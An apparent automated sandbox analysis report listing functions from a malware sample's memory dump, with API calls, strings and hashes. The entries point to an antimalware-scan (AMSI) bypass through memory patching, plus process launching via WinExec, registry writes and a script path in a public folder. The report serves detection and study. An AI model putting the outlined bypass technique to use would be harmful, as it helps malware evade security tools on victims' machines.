Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 3475578485-1053911981
Opcode ID: aa810cee19f6e73042839f9d6ddca6597443b2aaf988d2922a9d8668269367ab
Instruction ID: 3f1c8505901ae472ee54bedf9b063ef7e2454be5e890a3560eca6d58e21cf78d
Opcode Fuzzy Hash: aa810cee19f6e73042839f9d6ddca6597443b2aaf988d2922a9d8668269367ab
Instruction Fuzzy Hash: A222F434A801599FEB11EB64EAC1FCEB3F6BF89310F1081A2A505AB294DF30AD55CF55

Function 02A01724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02A017D0
Sleep.KERNEL32(0000000A,00000000), ref: 02A017E6

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f658a2513eb64b63323cc2f8a0338e00198313676e2755973f716f94fd35e949
Instruction ID: dbfd951c230e84257eb2f34097e3f327611cba59fde1841d532db068b7d3014d
Opcode Fuzzy Hash: f658a2513eb64b63323cc2f8a0338e00198313676e2755973f716f94fd35e949
Instruction Fuzzy Hash: 89B12272A002528FDB15CF68E8C0395BBE1EB89315F1986AED44D8B3C5DF70E556CB90

Function 02A188B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02A188C1

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A18920

Strings

W, xrefs: 02A188CD
amsi, xrefs: 02A188BC
DllGetClassObject, xrefs: 02A188E6

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 574e3339624bf3dbdffc176e8d03e3ed6e64c19b394f2df6cbbd8268c70defd2
Instruction ID: 47b0eb6752e808f100f8fa39b9441400b842dae67851600785336a78e207f92e
Opcode Fuzzy Hash: 574e3339624bf3dbdffc176e8d03e3ed6e64c19b394f2df6cbbd8268c70defd2
Instruction Fuzzy Hash: 90F0A45058C381BDE301E3B48C45F4FBECD4B62674F008A18B1E85A2D2DA79D1148B67

Function 02A01A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02A01FE4), ref: 02A01B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02A01FE4), ref: 02A01B31

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 61a1a231422a417b73befb996d6cc836670fcf4e18eaf283afbb91ff4d6c8760
Instruction ID: d5721a09f35783c5031e1b279334eab4a2d6e9922b59a4fb6135af94b8089011
Opcode Fuzzy Hash: 61a1a231422a417b73befb996d6cc836670fcf4e18eaf283afbb91ff4d6c8760
Instruction Fuzzy Hash: 1E51B0716412408FE715CF6CEAC4796BBE0AF4A314F1885AED548CB2C2EF70D446CB91

Function 02A1E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A1E5F6

Strings

OpenSession, xrefs: 02A1E598
ScanBuffer, xrefs: 02A1E53F
Initialize, xrefs: 02A1E4E6

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 2118a8ffc0f25d30a3c489626ef05a96dc74b3fd1d5fbe107668218354e60a95
Instruction ID: 191b6954c8d95bfd40a8688c2697a7aee5504780da912cb0ac8b149f4c88892f
Opcode Fuzzy Hash: 2118a8ffc0f25d30a3c489626ef05a96dc74b3fd1d5fbe107668218354e60a95
Instruction Fuzzy Hash: 87413135B80248ABEB01EBA4EA81ADEB3FAFF8C710F504435E551A7284DE34AD118F55

Function 02A185BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

WinExec.KERNEL32(?,?), ref: 02A18624

Strings

Kernel32, xrefs: 02A18607
WinExec, xrefs: 02A185D5

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 00445bc3f2f468ff41406bd0477a6c085d522418044261083e66a3065f5a1db8
Instruction ID: dadd89077f8027fa2726a0c074b44ad7c31454d88bc1447ecee4c343b27a567e
Opcode Fuzzy Hash: 00445bc3f2f468ff41406bd0477a6c085d522418044261083e66a3065f5a1db8
Instruction Fuzzy Hash: E6018175684304BFF700EBA4ED81F5EB7ADF708B50F604460F900D2680DE38AD108A25

Function 02A185BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

WinExec.KERNEL32(?,?), ref: 02A18624

Strings

Kernel32, xrefs: 02A18607
WinExec, xrefs: 02A185D5

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 34c6e8c5474494447c1dd31b47bc0c79b950bb8aff01fce27a4abc98f4b01511
Instruction ID: afd6b89dbdaccf5b46c56d4336e94d9517dd9afe72d11cb0ef8bbcc309c5b88e
Opcode Fuzzy Hash: 34c6e8c5474494447c1dd31b47bc0c79b950bb8aff01fce27a4abc98f4b01511
Instruction Fuzzy Hash: 9EF08175684304BFF700EBA4ED81F5EB7ADF708B50F604460F900D2680DE38AD108A25

Function 02A15C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A15D74,?,?,02A13900,00000001), ref: 02A15C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A15D74,?,?,02A13900,00000001), ref: 02A15CB6

Part of subcall function 02A07D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02A13900,02A15CF6,00000000,02A15D74,?,?,02A13900), ref: 02A07DAA

Part of subcall function 02A07F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02A13900,02A15D11,00000000,02A15D74,?,?,02A13900,00000001), ref: 02A07FB7

GetLastError.KERNEL32(00000000,02A15D74,?,?,02A13900,00000001), ref: 02A15D1B

Part of subcall function 02A0A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02A0C3D9,00000000,02A0C433), ref: 02A0A797

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 825488f9cfb7b1c14046e7a345e866b85e6c6214e7f5ee08247f30a1907f0bbc
Instruction ID: a8e3825d0d05f346d37e27ef7c6f729b4e34f878c45708f47840124d54772a1e
Opcode Fuzzy Hash: 825488f9cfb7b1c14046e7a345e866b85e6c6214e7f5ee08247f30a1907f0bbc
Instruction Fuzzy Hash: 1231B330E403059FDB00EFA8DAC5B9EBBF6AB49714F908465D504AB3C0DF7569058FA1

Function 02A1F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02B7BA58), ref: 02A1F258
RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F290
RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F29B

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: cdae79a3d940cfe989d116a5d42c1e43353a829cd56c156baab2f6031c18ccef
Instruction ID: fea0cba15593f2e4e4df4541faca08d4c22a51ea49f1b49a78109b99a9c090b6
Opcode Fuzzy Hash: cdae79a3d940cfe989d116a5d42c1e43353a829cd56c156baab2f6031c18ccef
Instruction Fuzzy Hash: 9611F871A80244AFEB00EFA8E9C1E9E77EDFB08794B405471B614D7690DE30EE508F64

Function 02A1F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02B7BA58), ref: 02A1F258
RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F290
RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F29B

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: f28ab6e09e61f5638148a45963cedceba20a8e5fde8c3c256a8324dd849f07b7
Instruction ID: c777786ced1bea87b66f068ed1623506b798ec704dee0904605527ae7de62cd0
Opcode Fuzzy Hash: f28ab6e09e61f5638148a45963cedceba20a8e5fde8c3c256a8324dd849f07b7
Instruction Fuzzy Hash: 4011F871A80244AFEB00EFA8E9C1E9E77EDFB08794B405461B614D7690DE30EE508F64

Function 02A0E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02A0E373

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: b784739485bc7e29859eeb575ad600a95295dc8618bc64506f338fdba2daa993
Instruction ID: 4417bd4201f987638037b7a534e07a042a9c3d5bf6972cb5cec6e549f9e771ef
Opcode Fuzzy Hash: b784739485bc7e29859eeb575ad600a95295dc8618bc64506f338fdba2daa993
Instruction Fuzzy Hash: 12F04920748210C79B247B39BFC4A697FAAAF443507141CB6A406DB2D5DF64CC45EB63

Function 02A04D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02A04D5B
SysFreeString.OLEAUT32(00000000), ref: 02A04D6D

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: e415647e418c9ac2a51a28fa149184639ce7c95751dd2ac9c4740f4dcc02c19c
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: 06E0ECB82052055EEB146F21BAC0B77622AAFD9745B5484A9A900CA1D4DF389840AD38

Function 02A170DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02A173DA

Strings

H, xrefs: 02A17191

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 05763058334a2a28eb042b25d9a791a374a91c5896150db4dd5c02710fb06c71
Instruction ID: efed2d5f07eebb49824cdf47c746ff158a11311ad321ce69d317f037bcb3422b
Opcode Fuzzy Hash: 05763058334a2a28eb042b25d9a791a374a91c5896150db4dd5c02710fb06c71
Instruction Fuzzy Hash: A0B1C274A016089FDB15CF99D9C0A9DFBF2FF89324F1495A9E845AB360DB30A846CF50

Function 02A0E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02A0E781

Part of subcall function 02A0E364: VariantClear.OLEAUT32(?), ref: 02A0E373

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 10b8c7c72e3b61f015c0709177543b4eb3d5e5c29f196f9c82d3f6347e41af86
Instruction ID: 944a63e7f6c4461a5d1c82c495cd84c15aed3b59a9c73dc803d35be608fb5286
Opcode Fuzzy Hash: 10b8c7c72e3b61f015c0709177543b4eb3d5e5c29f196f9c82d3f6347e41af86
Instruction Fuzzy Hash: D111863074021087C734AF29EBC4A6677EAAF847507108C66E54A8B2D5EF30EC45EB62

Function 02A0E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02A0E43C

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 5945214234f4c33f161eb6dbb9e466bb5ad96b6a35f737ce9d36667602ef5f3e
Instruction ID: de67ace0951f5f8fd91c7625f861fe07b6d2782540bdbf26e88f25579560af89
Opcode Fuzzy Hash: 5945214234f4c33f161eb6dbb9e466bb5ad96b6a35f737ce9d36667602ef5f3e
Instruction Fuzzy Hash: F1315271A00208ABDB50DFA8EAC4AAAB7F8EB0C314F544965F905D32C0DB37D950DBA1

Function 02A189D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC

Part of subcall function 02A18338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A183C2), ref: 02A183A4

FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
String ID:
API String ID: 1478290883-0
Opcode ID: 2491a042ea27dbba5d8c62d6967b3043f7806996849fad15af93b6b3c36a9df7
Instruction ID: 167dc27c82f88973c5a0a9dedb426bf8aa934ade0393d4b6fa94612618d27023
Opcode Fuzzy Hash: 2491a042ea27dbba5d8c62d6967b3043f7806996849fad15af93b6b3c36a9df7
Instruction Fuzzy Hash: 9C210374AC0704BFF740F7A4EE82B5EB799EB04B50F5014A0F604E71C0DE74A9608A19

Function 02A16D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02A16DB9,?,?,?,00000000), ref: 02A16D99

Part of subcall function 02A04C60: SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 7dcca02ad665ea3a27abe082d6f35980b550b7f8b629479e3a70de55dbb5397a
